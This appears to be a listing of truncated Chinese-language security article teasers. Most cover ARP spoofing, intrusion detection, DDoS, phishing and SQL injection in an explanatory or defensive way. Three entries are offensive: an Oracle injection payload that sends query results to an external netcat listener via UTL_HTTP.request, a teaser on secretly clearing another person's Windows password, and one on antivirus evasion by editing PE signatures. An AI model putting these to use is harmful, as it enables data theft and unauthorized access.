奔流不息的网络里,Web绽放着绚丽的色彩、电子邮件呼哧的穿梭网际、语音电话、网络会议、文件传输,各种数据交织错落,形成辉煌的数字世界。在喧闹的数字世界底层,存在一种精致的次序,这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔
2015-06-28是不是有时候想登录别人的电脑,但是又没有密码。虽然网上能找到很多教你清除Windows密码的文章,但是你又看不懂,或者觉得太麻烦了。你费了好大的尽,终于找到了可以用的方法,但却又发现一个严重的问题——清除掉密码之后,主人发现密码没了,那不
2015-06-28首先外网nc监听对应的端口 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- 爆库: select owner from all_tables where rownum=
2015-06-281、防止跳出web目录首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin
2015-06-28近一段时期以来,"黑客"已经成为网络上最热门的一个词语。我们看到,随着网络的普及和带宽资费的松动,国内的"黑客"部落,已经从最初的炫耀技术,慢慢向"职业化"发展。 早期的"黑客",主要利用操作系统或者软件的漏
2015-06-28提到这次MSN监听事件,往往人们会将矛头指向MSNChatMonitor&Sniffer,应该是因为这个软件的名字和本身的功能造成的。其实,对于交换式的局域网来说真正的幕后凶手另有其人。 一、防止ARP欺骗才是正解 说到这次MSN监听事件,往往人们会将矛头指向MSNC
2015-06-281、入侵检测的基本概念 入侵检测是指"通过对行为、安全日志或审计数据或其它网络上可以获得的信息进行操作,检测到对系统的闯入或闯入的企图"(参见国标gb/t18336)。入侵检测是检测和响应计算机误用的学科,其作用包括威慑、检测、响应、损失情况
2015-06-28多样化的攻击手段和攻击种类导致传统的网络安全设备无法单一应对这些威胁。通俗来讲,如果把防火墙比喻成防盗门,把IDS(入侵检测系统)比喻成摄像头,那么IPS(入侵防御系统)应该扮演的就是保安的角色,更多拥有的是主动性和人工智能。IPS产品的出现,为企业信息
2015-06-28CC 攻击的前身是 DDOS 攻击(分布式拒绝攻击)。 DDOS 攻击的原理针对 TCP/IP 协议的缺陷,也不能算是缺陷,只是当时设计该协议时是在几十年前,设计者假定大家都是遵守游戏规则的良好公民,现在互联网环境比当时要复杂得多,但是仍在使用以前的协议,所以才会带来
2015-06-28网络黑洞的产生原理 对网络技术有所了解的朋友都碰到过这种事情:在没有UPS不间断电源支撑的情况下,由于电源的突然中断,导致公司机房里包括路由器在内的所有设备都停止运行。 当电源恢复供应,节点路由器重新启动,内外网络互联在几分钟内却并未立刻完全恢
2015-06-28随着各种狡猾和恶毒的方法不断被应用,网络钓鱼(Phishing)和网址嫁接(Pharming)已经成为威胁每一个上网用户个人信息安全的严重问题。如果我们能够了解犯罪分子的犯罪手段,就可以保护自己不会成为犯罪分子的下一个目标。网络钓鱼介绍网络钓鱼是采用伪造合法机构
2015-06-28作为菜鸟 ,免杀改特征码 一步一步的走过来。遇到很多难改的特征码。这里为大家介绍下几处特征码的改法。纯属个人不成熟经验,有不对的地方望高手指正。1 定位在PE文件头。方法1 手工修改PE头。或用lord PE重建。 方法2 定位从400开
2015-06-2804月29日 据赛迪网消息:据国外媒体报道,即将于下月出版的《PC Magazine》评出了网络上最常用的10个密码。有趣的是,"password(密码)"的使用频率最高,排名首位。 以下为《PC Magazine》评出的网络上最常用的10个密码排名: 1. password
2015-06-28对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理 注射式攻击的根源在于,程序命令和用户数据(即用
2015-06-28当前,大部分用户密码被盗多是因为缺少网络安全保护意识以及自我保护意识,以致被黑客盗取引起经济损失,今天我将讨论一下针对昨天十类破解方法的对策,也举出十类密码安全和保护措施,可以帮助用户提高网络安全意识。 1、使用复杂的密码 密码穷举对于
2015-06-28今天接到田总的求助电话,火速赶回寝室上服务器查看情况,原来是一个网站被入侵了,破坏相当严重,sql数据库被挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实
2015-06-28无论是使用手工试探还是使用安全测试工具,恶意攻击者总是使用各种诡计从你的防火墙内部和外部攻破你的SQL服务器系统。既然黑客在做这样的事情。你也需要实施同样的攻击来检验你的系统的安全实力。这是理所当然的。下面是黑客访问和攻破运行SQL服务器的系统的十
2015-06-28伴随着512地震的影响,越来越多的用户通过互联网及时了解最新信息,而这也造成了近一个时期内SQL注入攻击频发,很多网站受到入侵。 在网站服务器被入侵后,用户必须要做的包括以下几点: 第一、先看看数
2015-06-28在一般的web程序里,显示数据给浏览器的时候都会指定一个字符集,在国内平时我们用到的字符集有utf-8,GBK,gb2312等等,字符集指示了浏览器该如何对待返回的数据。其中gb2312和GBK字符集使用得非常广泛,但是经证明,IE在处理这些宽字符集的时候存在问题,导致
2015-06-28ARP攻击在网吧企业泛滥,成为网络安全的极大隐患,防治ARP攻击成为当前网络安全的当务之急。Netcore成立专门小组,通过深入研究、反复试验,历时半年推出完善的ARP攻击防治方案,彻底解决网吧、企业因ARP攻击出现的掉线、卡机问题。 ARP攻击的原理和演化
2015-06-28